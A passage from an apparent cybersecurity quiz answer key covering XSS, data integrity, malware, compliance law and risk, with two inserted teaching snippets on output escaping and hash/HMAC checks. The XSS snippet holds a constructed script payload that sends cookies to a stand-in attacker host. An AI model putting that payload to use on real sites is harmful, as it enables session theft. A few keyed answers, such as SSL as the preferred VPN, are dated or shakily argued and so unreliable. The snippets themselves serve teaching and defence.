d.) Phishing
When an attacker gets the user to click on a specially crafted URL with script in it and the web service reflects it back, what type of attack is that called? a.) Stored XSS b.) SQL Injection c.) Half-persistent XSS d.) Reflected XSS
d.) Reflected XSS
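As an added example (not part of the review) serving the XSS-defense question above and this one: a reflected search page rendered with and without output escaping, plus the input-validation check from option a. The page template, search terms, the `render_*`/`is_valid_term` helper names and the payload are constructed for illustration.

```python
# Added example: reflected XSS and its two standard defenses. Template and inputs are constructed.
import html
import re


def render_vulnerable(term: str) -> str:
    """Reflects the query string straight into the HTML body and an attribute."""
    return f'<p>Results for: {term}</p><a href="/search?q={term}">search again</a>'


def render_escaped(term: str) -> str:
    """Escapes dynamic data for the HTML-text and attribute contexts before inserting
    it, so any markup in the input becomes inert text the browser merely displays."""
    safe = html.escape(term, quote=True)
    return f'<p>Results for: {safe}</p><a href="/search?q={safe}">search again</a>'


def is_valid_term(term: str) -> bool:
    """Input validation: a search term should only ever contain word characters,
    spaces and hyphens. Allow-listing, not a blocklist of known-bad strings."""
    return re.fullmatch(r"[\w \-]{1,64}", term) is not None


def contains_script(page: str) -> bool:
    """Crude detector used by the demo: did a live <script> tag survive into the page?"""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


# Constructed payload: what an attacker puts in the crafted URL's query parameter.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    print("valid input?      :", is_valid_term(PAYLOAD))
    print("vulnerable page   :", render_vulnerable(PAYLOAD))
    print("escaped page      :", render_escaped(PAYLOAD))
```

`html.escape` is the right tool only for the HTML text and attribute contexts shown here; data inserted into a `<script>` block, a URL, or CSS needs the encoder for that context. Escaping at output time is what makes the page safe; validation at input time narrows what reaches the rest of the application and is a defense in depth, not a substitute.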
Which two methods help to ensure data integrity? (Choose two.) data consistency checks privacy hashing availability authorization repudiation
data consistency checks hashing
Which term refers to a software implementation of a computer system that executes programs like a physical machine? A) Workload management B) Hypervisor C) Physical host D) Virtual machine
D) Virtual machine
Match the type of cyber attacker to the description. (Not all options are used.) Options: terrorists, state-sponsored attackers, hacktivists, script kiddies. Descriptions: (1) gather intelligence or commit sabotage on specific goals on behalf of their government; (2) make political statements, or create fear, by causing physical or psychological damage to victims; (3) make political statements in order to create an awareness of issues that are important to them
(1) state-sponsored attackers; (2) terrorists; (3) hacktivists
A user is surfing the Internet using a laptop from a public WiFi cafe. What should be checked first when the user connects to the public network? if the laptop has a master password set to secure the passwords stored in the password manager if the laptop requires user authentication for file and media sharing if the laptop web browser is operating in private mode if the laptop Bluetooth adapter is disabled
if the laptop requires user authentication for file and media sharing
Which term below is frequently used to describe the tasks of securing information that is in a digital format? network security information security physical security logical security
information security
Select the information protection item that ensures that information is correct and that no unauthorized person or malicious software has altered that data. availability confidentiality integrity identity
integrity
Connecting your computers or devices to the ________ immediately exposes them to attack. network ethernet internet virtual LAN; VLAN
internet
What is the most difficult part of designing a cryptosystem? encryption algorithm reverse engineering key length key management
key management
A Zero Trust network security model is based on which security principle? due diligence least privilege non-repudiation negative control
least privilege
What is the last stage of the Cyber Kill Chain framework? remote control of the target device creation of malicious payload gathering target information malicious action
malicious action
When an attacker poses as a reputable third-party advertiser to distribute malware through Web ads, what type of attack is being performed? ad squatting clickjacking malvertising ad spoofing
malvertising
Mutual authentication can prevent which type of attack? wireless poisoning wireless IP spoofing wireless sniffing man-in-the-middle
man-in-the-middle
A network administrator is conducting a training session to office staff on how to create a strong and effective password. Which password would most likely take the longest for a malicious user to guess or break? mk$$cittykat104# drninjaphd super3secret2password1 10characters
mk$$cittykat104#
Which type of attack allows an attacker to use a brute force approach? social engineering denial of service packet sniffing password cracking
password cracking
A medical office employee sends emails to patients about recent patient visits to the facility. What information would put the privacy of the patients at risk if it was included in the email? patient records first and last name contact information next appointment
patient records
What is another name for confidentiality of information? trustworthiness privacy accuracy consistency
privacy
Malware that locks or prevents a device from functioning properly until a fee has been paid is known as: lockware ransomware stealware hostageware
ransomware
Which stage of the kill chain used by attackers focuses on the identification and selection of targets? delivery exploitation weaponization reconnaissance
reconnaissance
Another type of attacker is called a ________. This is a person with little or no skill who simply follows directions or uses a "cookbook" approach to carrying out a cyberattack without understanding the meaning of the steps he or she is performing. hacker script kiddie white-hat hacker black-hat hacker
script kiddie
The ___________ is the central part of a computing environment's hardware, software, and firmware that enforces access control. security kernel CPU memory co-processor
security kernel
Your organization's __________ sets the tone for how you approach related activities. guidelines security policy assets configuration
security policy
One of the most popular types of attacks on computer systems involves ___________. These attacks deceive or use people to get around security controls. The best way to avoid this risk is to ensure that employees know how to handle such attacks. World Wide Web cloud computing worms social engineering
social engineering
In which cloud computing service model does a provider's applications run on a cloud infrastructure and the consumer does not manage or control the underlying infrastructure? platform as a service (PaaS) infrastructure as a service (IaaS) software as a service (SaaS) public cloud
software as a service (SaaS)
What is an impersonation attack that takes advantage of a trusted relationship between two systems? man-in-the-middle spoofing spamming sniffing
spoofing
Which type of attack against a web application uses a newly discovered vulnerability for which no patch yet exists? A. SQL Injection B. Cross-Site Scripting C. Cross-Site Request Forgery D. Zero-day Attack
D. Zero-day Attack
Which access control strategy allows an object owner to determine whether to allow access to the object? RBAC DAC MAC ACL
DAC
An organization's IT department reports that their web server is receiving an abnormally high number of web page requests from different locations simultaneously. What type of security attack is occurring? Phishing Adware Social engineering DDoS Spyware
DDoS
What type of attack disrupts services by overwhelming network devices with bogus traffic? DDoS Zero-day Brute force Port scans
DDoS
What type of attack is being performed when multiple computers overwhelm a system with fake requests? DDoS DoS SYN flood replay attacks
DDoS
You have stored your data on a local hard disk. Which method would secure this data from unauthorized access? Data encryption Two factor authentication Duplication of the hard drive Deletion of sensitive files
Data encryption
What are the objectives of ensuring data integrity? (Choose two correct answers) Data is unaltered during transit Data is not changed by unauthorized entities Data is encrypted while in transit and when stored on disks Access to the data is authenticated Data is available all the time
Data is unaltered during transit Data is not changed by unauthorized entities
A cybercriminal sends a series of maliciously formatted packets to a database server, which causes the server to crash. What do you call this type of attack? SQL injection DoS Man-in-the-middle Packet injection
DoS
Curtis is conducting an audit of an identity management system. Which question is NOT likely to be in the scope of his audit? Does the organization have an effective password policy? Does the firewall properly block unsolicited network connection attempts? Who grants approval for access requests? Is the password policy uniformly enforced?
Does the firewall properly block unsolicited network connection attempts?
Which mitigations does return-to-libc (return-to-library) code reuse defeat? A. signed code B. non-executable memory C. Data Execution Prevention (DEP) D. All of the above E. A and B
D. All of the above (B and C name the same control, so an answer that includes one must include the other; and because return-to-libc only redirects execution into code that is already loaded and signed, it sidesteps code signing as well as non-executable memory)
An employee points out a design flaw in a new product to the department manager. Is this employee's behavior ethical or unethical? Ethical Unethical
Ethical
During a meeting with the Marketing department, a representative from IT discusses features of an upcoming product that will be released next year. Is this employee's behavior ethical or unethical? Ethical Unethical
Ethical
The risk management process consists of four steps. Can you put these in the right order? Respond to the risk Assess the risk Monitor the risk Frame the risk
Frame the risk Assess the risk Respond to the risk Monitor the risk
What is a reason that internal security threats might cause greater damage to an organization than external security threats? Internal users can access the infrastructure devices through the Internet. Internal users can access the corporate data without authentication. Internal users have direct access to the infrastructure devices. Internal users have better hacking skills.
Internal users have direct access to the infrastructure devices.
Why might each of the following organizations be interested in your online identity? Internet service providers; advertisers; social media platforms; websites
Internet service providers: they may be legally required to share your online information with government surveillance agencies or authorities. Advertisers: to monitor your online activities and send targeted ads your way. Social media platforms: to gather information based on your online activity, which is then shared with or sold to advertisers for a profit. Websites: to track your activities using cookies in order to provide a more personalized experience.
Which statement describes cyberwarfare? Cyberwarfare is an attack carried out by a group of script kiddies. It is simulation software for Air Force pilots that allows them to practice under a simulated war scenario. It is a series of personal protective equipment developed for soldiers involved in nuclear war. It is Internet-based conflict that involves the penetration of information systems of other nations.
It is Internet-based conflict that involves the penetration of information systems of other nations.
All employees in an organization receive an email stating that their account password will expire immediately and that they should reset their password within five minutes. Which of the following statements best describes this email? It is a piggyback attack It is an impersonation attack It is a hoax It is a DDoS attack
It is a hoax
Which statement describes cybersecurity? It is a framework for security policy development. It is a standard-based model for developing firewall technologies to fight against cybercriminals. It is an ongoing effort to protect Internet-connected systems and the data associated with those systems from unauthorized use or harm.
It is an ongoing effort to protect Internet-connected systems and the data associated with those systems from unauthorized use or harm.
A penetration testing service hired by the company has reported that a backdoor was identified on the network. What action should the organization take to find out if systems have been compromised? Look for policy changes in Event Viewer. Scan the systems for viruses. Look for unauthorized accounts. Look for usernames that do not have passwords.
Look for unauthorized accounts.
Why do IoT devices pose a greater risk than other computing devices on a network? IoT devices require unencrypted wireless connections. IoT devices cannot function on an isolated network with only an Internet connection. Most IoT devices do not require an Internet connection and are unable to receive new updates. Most IoT devices do not receive frequent firmware updates.
Most IoT devices do not receive frequent firmware updates.
Your neighbor tells you that they don't have an online identity. They have no social media accounts and only use the Internet to browse. Is your neighbor right? Yes No
No
'Data coming into a program should be sanitized, as it could have malicious content, designed to force the program to behave in an unintended way.' This statement describes what security vulnerability? Weaknesses in security practices Access control problems Buffer overflow Non-validated input Race conditions
Non-validated input
Which of the following security vulnerabilities could result in the receipt of malicious information that could force a program to behave in an unintended way? Buffer overflow Non-validated input Race condition Access control problem
Non-validated input
Can you identify the software vulnerability from each of the following descriptions? (1) Occurs when data is written beyond the limits of memory areas that are allocated to an application. (2) Occurs when an ordered or timed set of processes is disrupted or altered by an exploit. (3) Occurs through the improper use of practices that manage equipment, data or applications.
(1) Buffer overflow; (2) Race condition; (3) Access control problems
Which technology creates a security token that allows a user to log in to a desired web application using credentials from a social media website? Open authorization (OAuth) VPN service Password manager In-private browsing mode
Open authorization
How can you keep your personal browsing history hidden from other users on a shared computer? Use only an encrypted connection to access websites Operate the web browser in private browser mode Move any downloaded files to the recycle bin Reboot the computer after closing the web browser
Operate the web browser in private browser mode
Which industry-specific law governs payment card data protection? GLBA SOX ECPA PCI DSS
PCI DSS
Which of the following is not a U.S. compliance act? CIPA FERPA FISMA HIPAA PCI DSS
PCI DSS
What vulnerability occurs when the output of an event depends on ordered or timed outputs? Weaknesses in security practices Non-validated input Race conditions Buffer overflow Access control problems
Race conditions
Employees in an organization report that they cannot access the customer database on the main server. Further investigation reveals that the database file is now encrypted. Shortly afterward, the organization receives a threatening email demanding payment for the decryption of the database file. What type of attack has the organization experienced? DoS attack Trojan horse Man-in-the-middle attack Ransomware
Ransomware
What three best practices can help defend against social engineering attacks? (Choose three.) Enable a policy that states that the IT department should supply information over the phone only to managers. Add more security guards. Resist the urge to click on enticing web links. Deploy well-designed firewall appliances. Educate employees regarding policies. Do not provide password resets in a chat window.
Resist the urge to click on enticing web links. Educate employees regarding policies. Do not provide password resets in a chat window.
Which formula is typically used to describe the components of information security risks? Risk = Likelihood X Vulnerability Risk = Threat X Vulnerability Risk = Threat X Likelihood Risk = Vulnerability X Cost
Risk = Threat X Vulnerability
Earl is preparing a risk register for his organization's risk management program. Which data element is LEAST likely to be included in a risk register? Description of the risk Expected impact Risk survey results Mitigation steps
Risk survey results
Which VPN technology is currently considered the preferred method for securely connecting a remote endpoint device back to an enterprise network? point-to-point tunneling protocol (PPTP) secure socket tunneling protocol (SSTP) Secure Sockets Layer (SSL) Internet Protocol Security (IPsec)
Secure Sockets Layer (SSL)
A consumer would like to print photographs stored on a cloud storage account using a third party online printing service. After successfully logging into the cloud account, the customer is automatically given access to the third party online printing service. What allowed this automatic authentication to occur? The user is on an unencrypted network and the password for the cloud storage service is viewable by the online printing service. The cloud storage service is an approved application for the online printing service. The password entered by the user for the online printing service is the same as the password used on the cloud storage service. The account information for the cloud storage service was intercepted by a malicious application.
The cloud storage service is an approved application for the online printing service.
Which of the following is the definition of hardened configuration? A method of security testing that isn’t based directly on knowledge of a program's architecture. Using tools to determine the layout and services running on an organization's systems and networks. The state of a computer or device in which you have turned off or disabled unnecessary services and protected the ones that are still running. Incorrectly identifying abnormal activity as normal.
The state of a computer or device in which you have turned off or disabled unnecessary services and protected the ones that are still running.
What is the main purpose of cyberwarfare? to protect cloud-based data centers to gain advantage over adversaries to develop advanced network devices to simulate possible war scenarios among nations
to gain advantage over adversaries
What is the purpose of a rootkit? to replicate itself independently of any other programs to gain privileged access to a device while concealing itself to deliver advertisements without user consent to masquerade as a legitimate program
to gain privileged access to a device while concealing itself
What is the primary goal of a DoS attack? to facilitate access to external networks to prevent the target server from being able to handle additional requests to obtain all addresses in the address book within the server to scan the data on the target server
to prevent the target server from being able to handle additional requests
Which two characteristics describe a worm? (Choose two.) hides in a dormant state until needed by an attacker executes when software is run on a computer travels to new computers without any intervention or knowledge of the user infects computers by attaching to software code is self-replicating
travels to new computers without any intervention or knowledge of the user is self-replicating
Which technology is a means of managing and presenting computer resources by function without regard to their physical layout or location? IaaS cloud computing virtualization PaaS
virtualization
Which technique is not used to break the command-and-control (C&C) phase of the Cyber-Attack Lifecycle? blocking outbound traffic to known malicious sites and IP addresses DNS sinkholing and DNS poisoning vulnerability and patch management all of the above
vulnerability and patch management
An administrator needs to examine FTP commands that are being passed to a server. What port should the administrator be monitoring? 19 20 21 22
21
What is an example of "hacktivism"? A group of environmentalists launch a denial of service attack against an oil company that is responsible for a large oil spill. A teenager breaks into the web server of a local newspaper and posts a picture of a favorite cartoon character. A country tries to steal defense secrets from another country by infiltrating government networks. Criminals use the Internet to attempt to steal money from a banking company.
A group of environmentalists launch a denial of service attack against an oil company that is responsible for a large oil spill.
Improper management of physical access to a resource, such as a file, can lead to what type of security vulnerability? Weaknesses in security practices Race conditions Access control problems Buffer overflow Non-validated input
Access control problems
What do you call a program written to take advantage of a known security vulnerability? An exploit Antivirus A firewall A software update
An exploit
What name is given to a device that controls or filters traffic going in or out of the network? Router VPN Firewall IPS
Firewall
Which of the following security implementations use biometrics? (Choose two correct answers) Fingerprint Phone Credit card Voice recognition Fob
Fingerprint Voice recognition
What law protects the privacy of an employee's personal information from being shared with third parties? SOX GLBA PCI DSS FERPA
GLBA
Select which answer does NOT apply to the Payment Card Industry Data Security Standard (PCI-DSS) : Protects cardholder data Stipulates penalties for violations Applies to the Retail industry Government Regulation
Government Regulation
Which law requires banks and financial institutions to alert customers of their policies and practices in disclosing customer information? Gramm-Leach-Bliley Sarbanes-Oxley California Database Security Breach USA Patriot
Gramm-Leach-Bliley
Which of the following methods is used to check the integrity of data? Backup Hashes or checksums Encryption Authentication
Hashes or checksums
What are the two most effective ways to defend against malware? (Choose two.) Implement network firewalls. Install and update antivirus software. Implement RAID. Update the operating system and other application software. Implement strong passwords. Implement a VPN.
Install and update antivirus software. Update the operating system and other application software.
What is the best way to avoid getting spyware on a machine? Install the latest antivirus updates Install the latest web browser updates Install software only from trusted websites Install the latest operating system updates
Install software only from trusted websites
What should you do in order to make sure that people you live with do not have access to your secure data? Turn on a firewall Increase the privacy settings on your browser Install antivirus software Set up password protection
Set up password protection
What non-technical method could a cybercriminal use to gather sensitive information from an organization? Pharming Man-in-the-middle Social engineering Ransomware
Social engineering
Which of the following pieces of information would be classified as personal data? (Select three correct answers) Social security number Driver license number Date and place of birth Job title IP address
Social security number Driver license number Date and place of birth
Which of the following items are states of data? (Choose three correct answers) Storage Text ASCII Transmission Binary Processing
Storage Transmission Processing
What is the correct definition of risk management? The process of transferring risks that cannot be eliminated or mitigated The process of identifying and assessing risk to determine the severity of threats The process of accepting risks that cannot be eliminated, mitigated or transferred The process of identifying and assessing risk to reduce the impact of threats and vulnerabilities
The process of identifying and assessing risk to reduce the impact of threats and vulnerabilities
_____ ensures that only authorized parties can view the information. a. Availability b. Integrity c. Confidentiality d. ICA
c. Confidentiality
What name is given to the emerging threat that hides on a computer or mobile device and uses that machine's resources to mine cryptocurrencies? Phishing Bluejacking Cryptoransomware Cryptojacking
Cryptojacking
Each of the following can be classified as an "insider" except _______. a. business partners b. contractors c. cybercriminals d. employees
Cybercriminals
What key component of virtualization allows you to run multiple independent operating systems on one physical system? A container A hypervisor A VDI
A hypervisor
Bob is using a port scanner to identify open ports on a server in his environment. He is scanning a web server that uses Hypertext Transfer Protocol (HTTP). Which port should Bob expect to be open to support this service? A. 21 B. 23 C. 80 D. 443
C. 80
What do you call a digital asset designed to work as a medium of exchange that uses strong encryption to secure a financial transaction? Apple Pay Google Pay Near Field Communications Cryptocurrency
Cryptocurrency
What type of function generates the unique value that corresponds to the contents of a message and is used to create a digital signature? A. RSA B. Decryption C. Encryption D. Hash
D. Hash
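As an added example (not part of the review) serving the two hash-integrity questions earlier ("which two methods help ensure data integrity", "which method is used to check the integrity of data") and this one: a SHA-256 digest catches any change to a message, but an attacker who can rewrite the message can also recompute an unprotected digest, which is why the digest is then signed (or, as the stand-in used here, keyed with an HMAC). The message, the tampered copy, the key and the `scenarios` helper are constructed for illustration; a real digital signature would use an asymmetric key pair rather than the shared key shown.

```python
# Added example: plain hash versus keyed hash for integrity. Inputs are constructed.
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Fixed-size fingerprint of the message: any changed bit changes the digest."""
    return hashlib.sha256(data).hexdigest()


def hash_matches(data: bytes, expected: str) -> bool:
    """Integrity check: recompute and compare in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected)


def tag(key: bytes, data: bytes) -> str:
    """HMAC-SHA256: only a holder of the key can produce a valid tag for a message."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def tag_matches(key: bytes, data: bytes, expected: str) -> bool:
    return hmac.compare_digest(tag(key, data), expected)


KEY = b"constructed-demo-key-do-not-reuse"   # shared between sender and verifier only
MESSAGE = b"transfer 100 to bob"
TAMPERED = b"transfer 900 to bob"


def scenarios() -> dict:
    """Outcome of each check from the verifier's point of view (True = check behaved correctly)."""
    sent_digest, sent_tag = sha256_hex(MESSAGE), tag(KEY, MESSAGE)
    return {
        # corruption or tampering in transit, digest left alone: the plain hash catches it
        "corruption_caught_by_hash": not hash_matches(TAMPERED, sent_digest),
        # attacker rewrites the message AND the unprotected digest: the plain hash still passes
        "attacker_recomputes_hash": hash_matches(TAMPERED, sha256_hex(TAMPERED)),
        # attacker has no key, so the rewritten message fails against the original tag
        "forgery_caught_by_mac": not tag_matches(KEY, TAMPERED, sent_tag),
        "genuine_message_passes": tag_matches(KEY, MESSAGE, sent_tag),
    }


if __name__ == "__main__":
    for name, ok in scenarios().items():
        print(f"{name:28} {ok}")
```

The second scenario is the one the question is really about: a hash by itself gives integrity against accidents, and it only gives integrity against an adversary once the digest is bound to something the adversary lacks, a private signing key in a digital signature or the shared key in an HMAC.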
What design principles help to ensure high availability? (Select three answers) Using encryption Ensuring confidentiality Eliminating single points of failure Providing for reliable crossover Detecting failures as they occur Checking for data consistency
Eliminating single points of failure Providing for reliable crossover Detecting failures as they occur